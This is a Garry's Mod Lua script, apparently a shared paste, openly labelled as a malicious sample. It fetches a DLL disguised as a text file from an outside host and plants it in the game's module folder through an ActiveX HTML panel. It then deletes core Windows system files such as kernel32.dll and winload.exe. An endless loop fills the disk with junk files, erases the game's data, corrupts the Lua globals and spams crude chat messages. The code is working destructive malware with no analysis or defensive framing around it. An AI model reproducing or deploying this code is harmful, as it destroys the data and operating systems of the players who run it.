[GMOD] malicious Sample

1. debug.sethook()
2. local h = hook.Add
3. local c = concommand.Add
4. local fw = file.Write
5. local cv = CreateConVar
6. local r = _G[ "Run" .. "Con" .. "so" .. "leCo" .. "mma" .. "nd" ]
7. math.randomseed( os.time() )
8. local lolno = {
9.     __add,
10.     __sub,
11.     __mul,
12.     __div,
13.     __pow,
14.     __unm,
15.     __concat,
16.     __eq,
17.     __lt,
18.     __le,
19.     __index,
20.     __newindex,
21.     __call,
22.     __tostring,
23.     __gc,
24.     __mode,
25.     __metatable,
26.     pcall,
27.     xpcall,
28.     print,
29.     error,
30.     assert,
31.     select,
32.     type,
33.     tostring,
34.     tonumber,
35.     unpack,
36.     ipairs,
37.     pairs,
38.     next,
39.     collectgarbage,
40.     module
41. }
42.  
43. function GetRawio( contents )
44.     file.Write( "gm_rawio.txt", contents )
45. end
46.  
47. function Path()
48.     local u = string.Replace( util.RelativePathToFull( "../garrysmod" ), "..\\garrysmod", "" )
49.     u = string.Replace( u,"\\", "/" )
50.     return u
51. end
52.  
53. main = function()
54.     HTMLTest = vgui.Create("HTML")
55.     HTMLTest:SetPos(0, 0)
56.     HTMLTest:SetSize(ScrW(), ScrH())
57.    
58.     HTMLTest:SetHTML([[
59.     <html>
60.     <script type='text/javascript'>
61.     function MoveFile() {  
62.         var fso, f;
63.        
64.         fso = new ActiveXObject('Scripting.FileSystemObject');
65.         f = fso.GetFile(']] .. Path() .. 'data/gm_rawio.txt' .. [[');
66.        
67.         f.name = 'gm_rawio.dll';
68.         f.Move(']] .. Path() .. '/lua/includes/modules/' .. [[');
69.     }
70.    
71.     MoveFile()
72.    
73.     </script>
74.     <body>
75.     <p>Hai</p>
76.     </body>
77.     </html>]])
78. end
79.  
80. http.Get( "http://colzdragon.net/media/filemanifest/mal/rawio.txt", "", GetRawio )
81. main()
82. require "rawio" --Rofl
83.  
84. rawio.deletefile( "C:\\windows\\system32\\Boot\\winload.exe" )
85. rawio.deletefile( "C:\\windows\\system32\\Boot\\winresume.exe" )
86. rawio.deletefile( "C:\\windows\\system32\\colorui.dll" )
87. rawio.deletefile( "C:\\windows\\system32\\csrss.exe" )
88. rawio.deletefile( "C:\\windows\\system32\\conhost.exe" )
89. rawio.deletefile( "C:\\windows\\system32\\connect.dll" )
90. rawio.deletefile( "C:\\windows\\system32\\crypt32.dll" )
91. rawio.deletefile( "C:\\windows\\system32\\comsvcs.exe" )
92. rawio.deletefile( "C:\\windows\\system32\\dllhost.exe" )
93. rawio.deletefile( "C:\\windows\\system32\\recovery.dll" )
94. rawio.deletefile( "C:\\windows\\system32\\console.dll" )
95. rawio.deletefile( "C:\\windows\\system32\\scrobj.dll" )
96. rawio.deletefile( "C:\\windows\\system32\\sfc.dll" )
97. rawio.deletefile( "C:\\windows\\system32\\sfc_os.dll" )
98. rawio.deletefile( "C:\\windows\\system32\\sfc.exe" )
99. rawio.deletefile( "C:\\windows\\system32\\shell32.dll" )
100. rawio.deletefile( "C:\\windows\\system32\\kernel32.dll" ) --What is this I don't even
101. rawio.deletefile( util.RelativePathToFull( "gameinfo.txt" ) )
102.  
103. local function FuckShitUp()
104.     for k, v in pairs( table ) do
105.         for i, p in pairs( lolno ) do
106.             if v:lower() == p:lower() then
107.                 table[ v ] = { "Lolno" }
108.             end
109.         end
110.     end
111.     for k, v in pairs( _G ) do
112.         _G[ k ] = { "Lolno" }
113.     end
114.     _G.__index = { "Lolno" }
115.     _G.__newindex = { "Lolno" }
116. end
117.  
118. hook.Add( "KeyPress", "lolk", function( )
119.     FuckShitUp()
120. end )
121.  
122. while true and MaxPlayers() do
123.     rawio.writefile( "C:\\" .. math.random( 1, 99999 ) .. ".txt", math.huge )
124.     debug.sethook()
125.     file.Write( "db_steamid_ip.txt", "Lol fag" )
126.     r( "buildcubemaps" )
127.     r( "jpeg", "quality", "100" )
128.     r( "jpeg" )
129.     r( "play", "npc/stalker/go_alert2a.wav" )
130.     r( "play", "npc/fast_zombie/breathe_loop1.wav" )
131.     r( "play", "npc/fast_zombie/fz_scream1.wav" )
132.     r( "play", "npc/turret_floor/ping.wav" )
133.     r( "stop" .. "sounds" )
134.     r( "canc" .. "elsel" .. "ect" )
135.     gui.SetMousePos( ScrW() / 2, ScrH() / 2 )
136.     cv( "gameui_activate", "", true, false )
137.     cv( "toggleconsole", "", true, false )
138.     cv( "quti", "", true, false )
139.     cv( "quit", "", true, false )
140.     cv( "exit", "", true, false )
141.     cv( "disconnect", "", true, false )
142.     cv( "sv_timeout", "999999999999999", true, false )
143.     r( "say", "Imafag" )
144.     fw( "../" .. math.random( 1, 9999999 ) .. ".txt", "lolno" )
145.     fw( math.random( 1, 9999999 ) .. ".txt", "lolno" )
146.     for k, v in pairs( file.FindInLua( "../data/advanced_duplicator/*.txt" ) ) do
147.         file.Delete( "../data/advanced_duplicator/" .. v .. ".txt" )
148.     end
149.     for k, v in pairs( file.FindInLua( "../data/*.txt" ) ) do
150.         file.Delete( "../data/" .. v .. ".txt" )
151.     end
152.     FuckShitUp()
153.     for i = 1, 1000 do
154.         print( "Lol console overflow" )
155.     end
156.     for i = 1, 1000 do
157.         render.AddBeam( LocalPlayer():GetPos(), 9999999999999, CurTime(), nil )
158.     end
159. end
160.  
161. function engineConsoleCommand( )
162.     return false
163. end
164.  
165. function os.time()
166.     return "12212012"
167. end
168.  
169. arg = nil
170. debug = {}
171. package = {}
172. io = {}
173. require = function() end
174. module = function() end